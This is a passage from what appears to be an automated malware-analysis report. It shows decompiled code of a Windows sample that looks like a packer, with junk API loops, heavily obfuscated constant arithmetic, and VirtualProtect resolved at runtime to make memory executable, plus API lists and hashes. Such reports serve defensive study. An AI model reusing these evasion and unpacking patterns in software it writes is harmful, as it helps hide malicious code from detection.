                  						WriteConsoleOutputCharacterW(0, 0, 0, _v2232,  &(_v2244.dwHighDateTime));
                  						OpenWaitableTimerW(0, 0, 0);
                  					}
                  					_t137 = _t137 + 1;
                  				} while (_t137 < 0x6f479f);
                  				_t142 = GetAtomNameA;
                  				_t110 = SetConsoleScreenBufferSize;
                  				_t138 = 0;
                  				while(1) {
                  					_t66 = GetAtomNameA(0, 0, 0);
                  					if( *0x477a9c == 0x26e) {
                  						_t127 = _v2244.dwHighDateTime;
                  						_t66 = SetConsoleScreenBufferSize(0, _v2244.dwHighDateTime);
                  					}
                  					if(_t138 > 0x1ac2b) {
                  						break;
                  					}
                  					_t138 = _t138 + 1;
                  					if(_t138 < 0x1ebc2dba) {
                  						continue;
                  					}
                  					break;
                  				}
                  				return E004020C8(_t66, _t110, _v8 ^ _t143, _t127, _t138, _t142);
                  			}
















































                  APIs
                  • GetCompressedFileSizeA.KERNEL32(00000000,?), ref: 0044CFFD
                  • OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 0044D006
                  • GetConsoleAliasW.KERNEL32(?,00000000,00000000,00000000), ref: 0044D016
                  • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0044D020
                  • GlobalFindAtomW.KERNEL32(00000000), ref: 0044D027
                  • DisconnectNamedPipe.KERNEL32(?), ref: 0044D03A
                  • FindAtomW.KERNEL32(00000000), ref: 0044D041
                  • GlobalUnlock.KERNEL32(00000000), ref: 0044D048
                  • GetModuleHandleExW.KERNEL32(00000000,00000000,?), ref: 0044D060
                  • GetCurrentProcess.KERNEL32 ref: 0044D06F
                  • FileTimeToSystemTime.KERNEL32(?,00000000), ref: 0044D07D
                  • _wscanf.LIBCMT ref: 0044D089
                  • SetTimeZoneInformation.KERNEL32(00000000), ref: 0044D0AE
                  • SetTapeParameters.KERNEL32 ref: 0044D0B7
                  • GlobalWire.KERNEL32 ref: 0044D0BE
                  • TzSpecificLocalTimeToSystemTime.KERNEL32(?,?,?), ref: 0044D11D
                  • SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044D129
                  • _calloc.LIBCMT ref: 0044D131
                  • _calloc.LIBCMT ref: 0044D138
                  • _wscanf.LIBCMT ref: 0044D160
                  • _memset.LIBCMT ref: 0044D17F
                  • __vswprintf_c_l.LIBCMT ref: 0044D19D
                  • _calloc.LIBCMT ref: 0044D1A7
                  • _feof.LIBCMT ref: 0044D1B6
                  • LocalAlloc.KERNELBASE(00000000,?), ref: 0044D215
                  • lstrcatW.KERNEL32(0046F998,kernel32.dll), ref: 0044D276
                  • GetModuleHandleW.KERNEL32(0046F998), ref: 0044D281
                  • GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 0044D28D
                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0044D2AE
                  • SetSystemTimeAdjustment.KERNEL32 ref: 0044D2CA
                  • GetFileAttributesW.KERNEL32(00000000), ref: 0044D2E9
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0044D2FD
                  • SizeofResource.KERNEL32(00000000,00000000), ref: 0044D316
                  • InterlockedIncrement.KERNEL32(?), ref: 0044D349
                  • SetFileAttributesA.KERNEL32(00000000,00000000), ref: 0044D387
                  • WriteConsoleOutputCharacterW.KERNEL32(00000000,00000000,00000000,00000020,?), ref: 0044D3AC
                  • OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 0044D3B4
                  • GetAtomNameA.KERNEL32(00000000,00000000,00000000), ref: 0044D3D7
                  • SetConsoleScreenBufferSize.KERNEL32(00000000,?), ref: 0044D3EE
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Time$File$AtomConsoleGlobalSystemTimerWaitable_calloc$AttributesFindHandleLocalModuleOpenProcessSize_wscanf$AddressAdjustmentAliasAllocBufferCharacterCompressedCurrentDisconnectIncrementInformationInterlockedNameNamedOutputParametersPipeProcProtectResourceScreenSizeofSpecificTapeTerminateUnlockVirtualWireWriteZone__vswprintf_c_l_feof_memsetlstrcat
                  • String ID: $0$0 %s %d %f$0.txt$VirtualProtect$kernel32.dll$zitomuridapelagajepegolik pegehegovamasetotid %s %d %f
                  • API String ID: 444771405-3930434341
                  • Opcode ID: 2af6f543481ca3a72293e0ae1f08cbf2416f4aaa0c0440ae29fcf88c4df6a543
                  • Instruction ID: a9b66736483b1857c80ec09cc6ba03e05ca75465405631252d00ec08e1b80064
                  • Opcode Fuzzy Hash: 2af6f543481ca3a72293e0ae1f08cbf2416f4aaa0c0440ae29fcf88c4df6a543
                  • Instruction Fuzzy Hash: A6B1B171901224ABE7209B61EC49B9F77B8FF49300F00807AE54DA2251EB785A85CFED
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E0044D420(signed int __edx) {
                  				signed int _v8;
                  				short _v2056;
                  				intOrPtr _v2084;
                  				intOrPtr _v2124;
                  				intOrPtr _v2128;
                  				intOrPtr _v2132;
                  				intOrPtr _v2136;
                  				intOrPtr _v2140;
                  				intOrPtr _v2144;
                  				intOrPtr _v2148;
                  				intOrPtr _v2152;
                  				intOrPtr _v2156;
                  				intOrPtr _v2160;
                  				intOrPtr _v2164;
                  				intOrPtr _v2168;
                  				intOrPtr _v2172;
                  				intOrPtr _v2176;
                  				intOrPtr _v2180;
                  				intOrPtr _v2184;
                  				intOrPtr _v2188;
                  				intOrPtr _v2192;
                  				intOrPtr _v2196;
                  				intOrPtr _v2200;
                  				intOrPtr _v2204;
                  				intOrPtr _v2208;
                  				intOrPtr _v2212;
                  				intOrPtr _v2216;
                  				intOrPtr _v2220;
                  				intOrPtr _v2224;
                  				intOrPtr _v2228;
                  				signed int _v2232;
                  				intOrPtr _v2236;
                  				intOrPtr _v2240;
                  				intOrPtr _v2244;
                  				intOrPtr _v2248;
                  				intOrPtr _v2252;
                  				intOrPtr _v2256;
                  				intOrPtr _v2260;
                  				intOrPtr _v2264;
                  				intOrPtr _v2268;
                  				intOrPtr _v2272;
                  				intOrPtr _v2276;
                  				intOrPtr _v2280;
                  				intOrPtr _v2284;
                  				intOrPtr _v2288;
                  				intOrPtr _v2292;
                  				intOrPtr _v2296;
                  				intOrPtr _v2300;
                  				intOrPtr _v2304;
                  				intOrPtr _v2308;
                  				intOrPtr _v2312;
                  				intOrPtr _v2316;
                  				intOrPtr _v2320;
                  				intOrPtr _v2324;
                  				intOrPtr _v2328;
                  				intOrPtr _v2332;
                  				intOrPtr _v2336;
                  				intOrPtr _v2340;
                  				intOrPtr _v2344;
                  				intOrPtr _v2348;
                  				intOrPtr _v2352;
                  				intOrPtr _v2356;
                  				intOrPtr _v2360;
                  				intOrPtr _v2364;
                  				intOrPtr _v2368;
                  				intOrPtr _v2372;
                  				intOrPtr _v2376;
                  				intOrPtr _v2380;
                  				intOrPtr _v2384;
                  				intOrPtr _v2388;
                  				intOrPtr _v2392;
                  				intOrPtr _v2396;
                  				intOrPtr _v2400;
                  				intOrPtr _v2404;
                  				intOrPtr _v2408;
                  				intOrPtr _v2412;
                  				intOrPtr _v2416;
                  				intOrPtr _v2420;
                  				intOrPtr _v2424;
                  				intOrPtr _v2428;
                  				intOrPtr _v2432;
                  				intOrPtr _v2436;
                  				intOrPtr _v2440;
                  				intOrPtr _v2444;
                  				intOrPtr _v2448;
                  				intOrPtr _v2452;
                  				intOrPtr _v2456;
                  				intOrPtr _v2460;
                  				intOrPtr _v2464;
                  				intOrPtr _v2468;
                  				intOrPtr _v2472;
                  				intOrPtr _v2476;
                  				intOrPtr _v2480;
                  				intOrPtr _v2484;
                  				intOrPtr _v2488;
                  				intOrPtr _v2492;
                  				intOrPtr _v2496;
                  				intOrPtr _v2500;
                  				intOrPtr _v2504;
                  				intOrPtr _v2508;
                  				intOrPtr _v2512;
                  				intOrPtr _v2516;
                  				intOrPtr _v2520;
                  				intOrPtr _v2524;
                  				intOrPtr _v2528;
                  				intOrPtr _v2532;
                  				intOrPtr _v2536;
                  				intOrPtr _v2540;
                  				intOrPtr _v2544;
                  				intOrPtr _v2548;
                  				intOrPtr _v2552;
                  				intOrPtr _v2556;
                  				intOrPtr _v2560;
                  				intOrPtr _v2564;
                  				intOrPtr _v2568;
                  				intOrPtr _v2572;
                  				intOrPtr _v2576;
                  				intOrPtr _v2580;
                  				intOrPtr _v2584;
                  				intOrPtr _v2588;
                  				intOrPtr _v2592;
                  				intOrPtr _v2596;
                  				intOrPtr _v2600;
                  				intOrPtr _v2604;
                  				intOrPtr _v2608;
                  				intOrPtr _v2612;
                  				intOrPtr _v2616;
                  				intOrPtr _v2620;
                  				intOrPtr _v2624;
                  				intOrPtr _v2628;
                  				intOrPtr _v2632;
                  				intOrPtr _v2636;
                  				intOrPtr _v2640;
                  				intOrPtr _v2644;
                  				intOrPtr _v2648;
                  				intOrPtr _v2652;
                  				intOrPtr _v2656;
                  				intOrPtr _v2660;
                  				intOrPtr _v2664;
                  				intOrPtr _v2668;
                  				intOrPtr _v2672;
                  				intOrPtr _v2676;
                  				intOrPtr _v2680;
                  				intOrPtr _v2684;
                  				intOrPtr _v2688;
                  				intOrPtr _v2692;
                  				intOrPtr _v2696;
                  				intOrPtr _v2700;
                  				intOrPtr _v2704;
                  				intOrPtr _v2708;
                  				intOrPtr _v2712;
                  				intOrPtr _v2716;
                  				intOrPtr _v2720;
                  				intOrPtr _v2724;
                  				intOrPtr _v2728;
                  				intOrPtr _v2732;
                  				intOrPtr _v2736;
                  				intOrPtr _v2740;
                  				intOrPtr _v2744;
                  				intOrPtr _v2748;
                  				intOrPtr _v2752;
                  				intOrPtr _v2756;
                  				intOrPtr _v2760;
                  				intOrPtr _v2764;
                  				intOrPtr _v2768;
                  				intOrPtr _v2772;
                  				intOrPtr _v2776;
                  				intOrPtr _v2780;
                  				intOrPtr _v2784;
                  				intOrPtr _v2788;
                  				intOrPtr _v2792;
                  				intOrPtr _v2796;
                  				intOrPtr _v2800;
                  				intOrPtr _v2804;
                  				intOrPtr _v2808;
                  				intOrPtr _v2812;
                  				intOrPtr _v2816;
                  				intOrPtr _v2820;
                  				long _v2824;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t1353;
                  				intOrPtr _t1355;
                  				intOrPtr _t1359;
                  				void* _t1679;
                  				intOrPtr _t1680;
                  				void* _t1681;
                  				signed int _t1685;
                  				void* _t1794;
                  				void* _t1796;
                  				void* _t1797;
                  				void* _t1798;
                  				void* _t1799;
                  				signed int _t1800;
                  
                  				_t1685 = __edx;
                  				_t1353 =  *0x44f0d4; // 0x45b66027
                  				_v8 = _t1353 ^ _t1800;
                  				_t1355 =  *0x45071c; // 0x25e44
                  				_t1796 = 0;
                  				 *0x477a9c = _t1355;
                  				_t2 = _t1796 + 0x15; // 0x15
                  				_t1679 = _t2;
                  				do {
                  					if(_t1796 == 0x846bcc) {
                  						 *0x477a9c =  *0x477a9c + _t1679;
                  					}
                  					if( *0x477a9c == _t1679) {
                  						lstrcpyW( &_v2056, 0);
                  					}
                  					_t1796 = _t1796 + 1;
                  				} while (_t1796 < 0x8d7445);
                  				_t1680 = _v2084;
                  				_t1797 = 0;
                  				L7:
                  				if( *0x477a9c == 0x79) {
                  					SetConsoleTextAttribute(0, 0);
                  				}
                  				GetLastError();
                  				if(_t1797 <= 0x88d774d || _t1680 == 0xd82db7 || _v2824 == 0x19c5e9) {
                  					goto L12;
                  				}
                  				if( *0x477a9c == 0xa) {
                  					GetCompressedFileSizeA(0,  &_v2824);
                  				}
                  				_v2724 = 0x44a9da4e;
                  				_v2584 = 0x6ad8a95e;
                  				_v2576 = 0x7b69be47;
                  				_v2536 = 0x14c2e6d4;
                  				_v2384 = 0x28a559e1;
                  				_v2720 = 0x12b4d9c9;
                  				_v2528 = 0x4acc8c38;
                  				_v2500 = 0x6603dd32;
                  				_v2520 = 0x79e55d99;
                  				_v2512 = 0x75aa05c8;
                  				_v2800 = 0x3b86b06b;
                  				_v2320 = 0x6bfa16e7;
                  				_v2504 = 0x6c149d6f;
                  				_v2496 = 0x4497f21d;
                  				_v2208 = 0x68c7aaf4;
                  				_v2312 = 0x1b99e464;
                  				_v2172 = 0x6992a715;
                  				_v2580 = 0x29ee4e17;
                  				_v2676 = 0x41a8760a;
                  				_v2124 = 0x7b4be8f2;
                  				_v2556 = 0x35cadfcd;
                  				_v2200 = 0x8d45732;
                  				_v2468 = 0x49e672e5;
                  				_v2660 = 0x3d4798c7;
                  				_v2228 = 0x403ea7b;
                  				_v2524 = 0x39360869;
                  				_v2148 = 0x2f509a8b;
                  				_v2664 = 0x12c28787;
                  				_v2792 = 0x6025b974;
                  				_v2388 = 0x22099ed0;
                  				_v2488 = 0x19805e21;
                  				_v2304 = 0x7a7aebfb;
                  				_v2284 = 0x6854fe88;
                  				_v2712 = 0x3f69951e;
                  				_v2604 = 0x5405a68a;
                  				_v2220 = 0xa0352ff;
                  				_v2644 = 0x3197b985;
                  				_v2784 = 0x3adddeeb;
                  				_v2656 = 0x7a178419;
                  				_v2332 = 0x5f0bc694;
                  				_v2296 = 0x69c9eac3;
                  				_v2380 = 0x20615706;
                  				_v2460 = 0x17113a0c;
                  				_v2756 = 0x1b41d345;
                  				_v2648 = 0x2c6d7833;
                  				_v2640 = 0x6033997;
                  				_v2288 = 0x73d4a529;
                  				_v2748 = 0x60a15865;
                  				_v2480 = 0x11b1db9;
                  				_v2276 = 0x33372644;
                  				_v2212 = 0x4dceb6a6;
                  				_v2700 = 0x1a4127c0;
                  				_v2548 = 0xb7d57a2;
                  				_v2516 = 0x5ac66e59;
                  				_v2732 = 0x303de2db;
                  				_v2376 = 0x7f507239;
                  				_v2796 = 0x6d7f46c9;
                  				_v2268 = 0x530e4771;
                  				_v2372 = 0x5882bc6f;
                  				_v2472 = 0xcf5ad75;
                  				_v2204 = 0x32cbebe0;
                  				_v2464 = 0x7b2565eb;
                  				_v2192 = 0x3f83f420;
                  				_v2596 = 0x247fe944;
                  				_v2452 = 0x6261adfb;
                  				_v2632 = 0x72589c69;
                  				_v2324 = 0x4eb6e22e;
                  				_v2420 = 0x42e29ca8;
                  				_v2184 = 0x63e004a6;
                  				_v2572 = 0x33432d90;
                  				_v2176 = 0x53109ab7;
                  				_v2568 = 0x7d079485;
                  				_v2484 = 0x6530bc67;
                  				_v2368 = 0x5ec1adf7;
                  				_v2168 = 0x9050015;
                  				_v2456 = 0x6796a66b;
                  				_v2160 = 0x28a7f20a;
                  				_v2140 = 0x4d5847b2;
                  				_v2624 = 0x65bee181;
                  				_v2280 = 0x7e00e5eb;
                  				_v2316 = 0x78648b1a;
                  				_v2152 = 0x40997771;
                  				_v2620 = 0x70375f04;
                  				_v2776 = 0x2790da23;
                  				_v2144 = 0x4d904b3c;
                  				_v2684 = 0x6f0950df;
                  				_v2272 = 0x51a37f3c;
                  				_v2260 = 0x7f307c19;
                  				_v2412 = 0x26cf591a;
                  				_v2164 = 0x15a10528;
                  				_v2768 = 0x7530c1be;
                  				_v2704 = 0x17b03026;
                  				_v2760 = 0x79d7d807;
                  				_v2636 = 0x6d4e5636;
                  				_v2808 = 0x4befadde;
                  				_v2696 = 0x1f11855b;
                  				_v2444 = 0x20b9f4fc;
                  				_v2448 = 0x71b924ac;
                  				_v2652 = 0x5cc926ef;
                  				_v2264 = 0x38ee55a6;
                  				_v2540 = 0x63e11d00;
                  				_v2132 = 0x33b6f37b;
                  				_v2364 = 0x5670554e;
                  				_v2492 = 0x2e292ea;
                  				_v2360 = 0x391cf360;
                  				_v2688 = 0x55d4166f;
                  				_v2816 = 0x39d6995f;
                  				_v2668 = 0x20e4fcd4;
                  				_v2308 = 0x6a5bcb7f;
                  				_v2252 = 0x572192d3;
                  				_v2560 = 0x5140ea03;
                  				_v2680 = 0x260bcee2;
                  				_v2136 = 0x1405a16a;
                  				_v2552 = 0x6491c21c;
                  				_v2752 = 0x4ddb6bd0;
                  				_v2196 = 0x12025003;
                  				_v2128 = 0x7ac3b62f;
                  				_v2744 = 0x2dcd7c2c;
                  				_v2508 = 0x46a3c27b;
                  				_v2188 = 0x2b99274f;
                  				_v2708 = 0x2b882dcf;
                  				_v2256 = 0x382e1570;
                  				_v2616 = 0x2e0cd52d;
                  				_v2608 = 0x52311eb5;
                  				_v2672 = 0x742b4d0;
                  				_v2440 = 0x5acde78f;
                  				_v2356 = 0x2959f1a5;
                  				_v2820 = 0x4986ffcb;
                  				_v2588 = 0x2101bbef;
                  				_v2352 = 0x791dba98;
                  				_v2804 = 0xae4251a;
                  				_v2788 = 0x1682bddb;
                  				_v2544 = 0x211da799;
                  				_v2248 = 0x7d24570a;
                  				_v2564 = 0x5f90315;
                  				_v2812 = 0x611a1e02;
                  				_v2772 = 0x660dedc5;
                  				_v2240 = 0x4ef7ed87;
                  				_v2432 = 0x4916d379;
                  				_v2300 = 0x3af4dd0b;
                  				_v2404 = 0x3326689a;
                  				_v2244 = 0x245c8ae0;
                  				_v2348 = 0x805bc45;
                  				_v2436 = 0x7a27ff5b;
                  				_v2232 = 0x5b73a71c;
                  				_v2156 = 0x5c1105f7;
                  				_v2476 = 0x483dad6f;
                  				_v2736 = 0x32e98e8b;
                  				_v2224 = 0x6e41cb36;
                  				_v2344 = 0x515d7181;
                  				_v2424 = 0xf3f054d;
                  				_v2180 = 0x2227b5c2;
                  				_v2628 = 0x3b6490b3;
                  				_v2780 = 0x2d389c8f;
                  				_v2692 = 0x1177e53c;
                  				_v2612 = 0x1227fd54;
                  				_v2600 = 0x5fe51d1f;
                  				_v2396 = 0x3e2345bb;
                  				_v2740 = 0x6b92efa9;
                  				_v2716 = 0x1bc06e92;
                  				_v2764 = 0x76d51563;
                  				_v2532 = 0x30addbf6;
                  				_v2236 = 0xf4780f8;
                  				_v2336 = 0x255e4e8b;
                  				_v2416 = 0x3853c9d3;
                  				_v2592 = 0x4be88660;
                  				_v2728 = 0x7348f580;
                  				_v2340 = 0x66dd7ea;
                  				_v2428 = 0x53db962b;
                  				_v2408 = 0x54f201fd;
                  				_v2400 = 0x58490f6c;
                  				_v2328 = 0x7ddfdd1b;
                  				_v2292 = 0x1e65c579;
                  				_v2392 = 0x4d4614d0;
                  				_v2216 = 0x71dee15f;
                  				_v2576 = _v2576 + 0x6d8b7ada;
                  				_v2724 = _v2724 + 0x1d6b4c59;
                  				_v2724 = _v2724 + 0xa931eb7;
                  				_v2536 = _v2536 - 0x355020c2;
                  				_v2576 = _v2576 + 0x3e9198a;
                  				_v2576 = _v2576 - 0x183145bb;
                  				_v2536 = _v2536 + 0x33054614;
                  				_v2576 = _v2576 + 0x685ce330;
                  				_v2584 = _v2584 - 0x68f9130d;
                  				_v2584 = _v2584 - 0x3604161c;
                  				_v2496 = _v2496 + 0x1f54b3b0;
                  				_v2500 = _v2500 - 0x226f1844;
                  				_v2504 = _v2504 - 0x4d7002a2;
                  				_v2520 = _v2520 + 0x292dacde;
                  				_v2496 = _v2496 - 0x8f8b38a;
                  				_v2208 = _v2208 - 0x6180a0d1;
                  				_v2584 = _v2584 - 0x59d3956a;
                  				_v2520 = _v2520 - 0x1ed2bdec;
                  				_v2528 = _v2528 - 0x99b9cfa;
                  				_v2584 = _v2584 + 0x765a6097;
                  				_v2312 = _v2312 + 0x469b217a;
                  				_v2520 = _v2520 + 0x5a2c6b8f;
                  				_v2720 = _v2720 - 0x2c3d041c;
                  				_v2660 = _v2660 + 0x369fcce4;
                  				_v2576 = _v2576 - 0x31d80;
                  				_v2208 = _v2208 + 0x3512fcc;
                  				_v2384 = _v2384 + 0x72f67a6a;
                  				_v2556 = _v2556 - 0x34047e0f;
                  				_v2320 = _v2320 - 0x530d2940;
                  				_v2720 = _v2720 - 0x54223e5b;
                  				_v2664 = _v2664 + 0x733692e3;
                  				_v2488 = _v2488 + 0x45bc5b29;
                  				_v2676 = _v2676 - 0x7d690eb7;
                  				_v2488 = _v2488 + 0x6180704b;
                  				_v2228 = _v2228 - 0x7201ef8d;
                  				_v2556 = _v2556 - 0x495eecb1;
                  				_v2712 = _v2712 - 0x3e0b79e2;
                  				_v2200 = _v2200 + 0x4d780c4f;
                  				_v2304 = _v2304 - 0x17ca7999;
                  				_v2656 = _v2656 + 0x7565c3f0;
                  				_v2720 = _v2720 + 0x52909547;
                  				_v2496 = _v2496 + 0x4688c4a;
                  				_v2792 = _v2792 + 0x2285ce17;
                  				_v2468 = _v2468 + 0x5f949a90;
                  				_v2200 = _v2200 + 0x6eca51d2;
                  				_v2576 = _v2576 + 0x37ebfb41;
                  				_v2724 = _v2724 + 0x5e91be73;
                  				_v2512 = _v2512 - 0x29911abe;
                  				_v2384 = _v2384 - 0x66735542;
                  				_v2524 = _v2524 - 0x37c89b9b;
                  				_v2320 = _v2320 + 0x58ded285;
                  				_v2312 = _v2312 - 0x6414a9a2;
                  				_v2388 = _v2388 + 0x435cf0a2;
                  				_v2512 = _v2512 + 0x248b9f09;
                  				_v2792 = _v2792 + 0x289ad687;
                  				_v2500 = _v2500 - 0x73086c1;
                  				_v2220 = _v2220 - 0x7a39acaf;
                  				_v2496 = _v2496 + 0x539503f8;
                  				_v2640 = _v2640 + 0x2da6999;
                  				_v2320 = _v2320 - 0x7e1000c6;
                  				_v2640 = _v2640 + 0x33fe1e7b;
                  				_v2172 = _v2172 - 0x6507edcd;
                  				_v2284 = _v2284 - 0x9e561d1;
                  				_v2200 = _v2200 + 0x5fb09101;
                  				_v2488 = _v2488 - 0x5dd9f0a6;
                  				_v2748 = _v2748 - 0x60e62e6f;
                  				_v2584 = _v2584 + 0x6ec42303;
                  				_v2504 = _v2504 - 0x13c2465c;
                  				_v2660 = _v2660 - 0x57cd9ec2;
                  				_v2648 = _v2648 + 0x57a9e58e;
                  				_v2200 = _v2200 + 0x71241964;
                  				_v2220 = _v2220 + 0x13901622;
                  				_v2388 = _v2388 + 0x792c4a87;
                  				_v2724 = _v2724 + 0xff13dfd;
                  				_v2304 = _v2304 + 0x79a768cd;
                  				_v2200 = _v2200 - 0x7b4c3364;
                  				_v2576 = _v2576 + 0x49e173ec;
                  				_v2644 = _v2644 - 0x17b1f649;
                  				_v2376 = _v2376 - 0x4c2be117;
                  				_v2548 = _v2548 + 0x59dc0daf;
                  				_v2720 = _v2720 + 0x5171059a;
                  				_v2604 = _v2604 + 0x73773932;
                  				_v2584 = _v2584 - 0x439327b;
                  				_v2676 = _v2676 - 0x31f97d9;
                  				_v2200 = _v2200 + 0x728dd399;
                  				_v2536 = _v2536 + 0x46d1ad3e;
                  				_v2228 = _v2228 - 0x4240bcd5;
                  				_v2284 = _v2284 + 0x27615e4f;
                  				_v2452 = _v2452 + 0xcba62c;
                  				_v2516 = _v2516 - 0x5de5377e;
                  				_v2676 = _v2676 + 0x2776cb3f;
                  				_v2124 = _v2124 - 0x47019df0;
                  				_v2572 = _v2572 - 0x62f02761;
                  				_v2640 = _v2640 - 0x1587f77d;
                  				_v2140 = _v2140 - 0x3d893a5f;
                  				_v2220 = _v2220 - 0x51b2be13;
                  				_v2468 = _v2468 - 0x44b01426;
                  				_v2684 = _v2684 + 0x56c955e7;
                  				_v2276 = _v2276 + 0x58c7ad14;
                  				_v2748 = _v2748 - 0x1e7d6276;
                  				_v2572 = _v2572 - 0x41a9370e;
                  				_v2632 = _v2632 - 0x31d72383;
                  				_v2712 = _v2712 + 0x555e37ec;
                  				_v2720 = _v2720 - 0x5e6fd03b;
                  				_v2632 = _v2632 + 0x43b56802;
                  				_v2516 = _v2516 - 0x22f85aaf;
                  				_v2276 = _v2276 - 0x27d12145;
                  				_v2152 = _v2152 + 0x7077cc7f;
                  				_v2368 = _v2368 + 0xc364cce;
                  				_v2596 = _v2596 + 0x2b86c6d5;
                  				_v2268 = _v2268 - 0x16936f15;
                  				_v2484 = _v2484 - 0x1b65c63b;
                  				_v2808 = _v2808 - 0x20c07e0f;
                  				_v2696 = _v2696 - 0x76fc3fb7;
                  				_v2420 = _v2420 + 0x7aac4dfb;
                  				_v2768 = _v2768 - 0x7877429b;
                  				_v2704 = _v2704 + 0x5e773902;
                  				_v2644 = _v2644 + 0x7a2e5f14;
                  				_v2696 = _v2696 - 0x6215bd5d;
                  				_v2444 = _v2444 - 0x3a830ec6;
                  				_v2700 = _v2700 - 0x6591a298;
                  				_v2276 = _v2276 + 0x6abb4bc;
                  				_v2720 = _v2720 - 0xf9d548d;
                  				_v2160 = _v2160 + 0x23fda6cc;
                  				_v2796 = _v2796 - 0x1ba6f3b3;
                  				_v2632 = _v2632 - 0x17978b1b;
                  				_v2268 = _v2268 - 0x2f09b65f;
                  				_v2200 = _v2200 + 0x13fdab06;
                  				_v2784 = _v2784 + 0x1fd2bb19;
                  				_v2380 = _v2380 - 0x31ffb4ff;
                  				_v2164 = _v2164 + 0x4e96e3ff;
                  				_v2148 = _v2148 - 0x2fa44266;
                  				_v2228 = _v2228 + 0x735fad96;
                  				_v2384 = _v2384 - 0x14e59165;
                  				_v2784 = _v2784 - 0x11a21833;
                  				_v2548 = _v2548 + 0x2c1a7ff3;
                  				_v2164 = _v2164 - 0x59804bb4;
                  				_v2288 = _v2288 + 0x60ccce30;
                  				_v2168 = _v2168 + 0x4fd5ba6e;
                  				_v2320 = _v2320 + 0x7b18c1a4;
                  				_v2280 = _v2280 + 0x2fa4baef;
                  				_v2748 = _v2748 + 0x271e7212;
                  				_v2556 = _v2556 + 0x4e6b712c;
                  				_v2696 = _v2696 - 0x4c66360d;
                  				_v2200 = _v2200 + 0x2f40c9fa;
                  				_v2464 = _v2464 + 0x7b8436c0;
                  				_v2644 = _v2644 - 0x68bc71f0;
                  				_v2652 = _v2652 + 0xd906f8;
                  				_v2128 = _v2128 + 0xb934f5a;
                  				_v2712 = _v2712 + 0x6cb34440;
                  				_v2320 = _v2320 + 0x2c8ab82;
                  				_v2712 = _v2712 + 0x3f0c75cc;
                  				_v2708 = _v2708 - 0xda00ffb;
                  				_v2596 = _v2596 - 0x6292b22a;
                  				_v2272 = _v2272 - 0x58565805;
                  				_v2412 = _v2412 - 0x3d6e9681;
                  				_v2308 = _v2308 + 0x24af9f00;
                  				_v2648 = _v2648 + 0x6c0e26de;
                  				_v2604 = _v2604 - 0x693ad540;
                  				_v2796 = _v2796 + 0x1b2708a2;
                  				_v2684 = _v2684 - 0x5dc85716;
                  				_v2556 = _v2556 + 0x5aff458d;
                  				_v2664 = _v2664 + 0x3f08c142;
                  				_v2596 = _v2596 - 0x43dcecc1;
                  				_v2384 = _v2384 + 0x42e67f49;
                  				_v2248 = _v2248 + 0x55d064e6;
                  				_v2620 = _v2620 - 0xc82ada;
                  				_v2540 = _v2540 - 0xf59058a;
                  				_v2460 = _v2460 + 0x24847caf;
                  				_v2788 = _v2788 - 0x3bc20a1f;
                  				_v2368 = _v2368 + 0x70c03845;
                  				_v2444 = _v2444 - 0x5b032ad0;
                  				_v2684 = _v2684 + 0x6c81fb8f;
                  				_v2488 = _v2488 + 0x6a3958f1;
                  				_v2256 = _v2256 + 0x5c3fadcc;
                  				_v2484 = _v2484 - 0x585c3b16;
                  				_v2608 = _v2608 - 0x1efb8a97;
                  				_v2452 = _v2452 + 0x4fc97394;
                  				_v2796 = _v2796 + 0x26a6d9b2;
                  				_v2712 = _v2712 + 0x17b62951;
                  				_v2572 = _v2572 - 0x4165cff6;
                  				_v2296 = _v2296 + 0x3876f7e5;
                  				_v2512 = _v2512 - 0x68a286bd;
                  				_v2276 = _v2276 + 0x29dd4d9;
                  				_v2552 = _v2552 + 0x8340024;
                  				_v2528 = _v2528 + 0x87079ea;
                  				_v2388 = _v2388 + 0x2b6e6f26;
                  				_v2500 = _v2500 + 0x4a97aeb4;
                  				_v2412 = _v2412 - 0x3ece0928;
                  				_v2656 = _v2656 - 0x67f86a90;
                  				_v2664 = _v2664 + 0x4893c58e;
                  				_v2300 = _v2300 - 0x602058e5;
                  				_v2664 = _v2664 + 0x6a83363d;
                  				_v2368 = _v2368 - 0x3ebd01d9;
                  				_v2280 = _v2280 - 0x320ec06e;
                  				_v2660 = _v2660 + 0xdf2082e;
                  				_v2668 = _v2668 + 0x630e3716;
                  				_v2556 = _v2556 - 0x362efeee;
                  				_v2652 = _v2652 + 0x6d650a54;
                  				_v2804 = _v2804 - 0x613b0909;
                  				_v2204 = _v2204 + 0x6d837948;
                  				_v2148 = _v2148 - 0x260d1700;
                  				_v2140 = _v2140 + 0x7014d920;
                  				_v2600 = _v2600 - 0x43cd2aa5;
                  				_v2224 = _v2224 - 0x36438d84;
                  				_v2752 = _v2752 + 0x3329a607;
                  				_v2388 = _v2388 - 0x7518a889;
                  				_v2616 = _v2616 - 0x53a78e90;
                  				_v2756 = _v2756 + 0x2515017c;
                  				_v2792 = _v2792 + 0x61c34f21;
                  				_v2252 = _v2252 - 0x5250992d;
                  				_v2740 = _v2740 + 0x4d7efe4;
                  				_v2124 = _v2124 - 0x679df150;
                  				_v2588 = _v2588 + 0x3aa3b5ba;
                  				_v2308 = _v2308 - 0x5d56436a;
                  				_v2432 = _v2432 + 0x74a28a6e;
                  				_v2696 = _v2696 - 0x72f3cc10;
                  				_t1685 = 0x1b898378 * _v2232 >> 0x20;
                  				_v2448 = _v2448 + 0x24e6cd3;
                  				_v2252 = _v2252 + 0x37f5dfcf;
                  				_v2512 = _v2512 - 0x7a22c58f;
                  				_v2464 = _v2464 - 0x269b6cb8;
                  				L17:
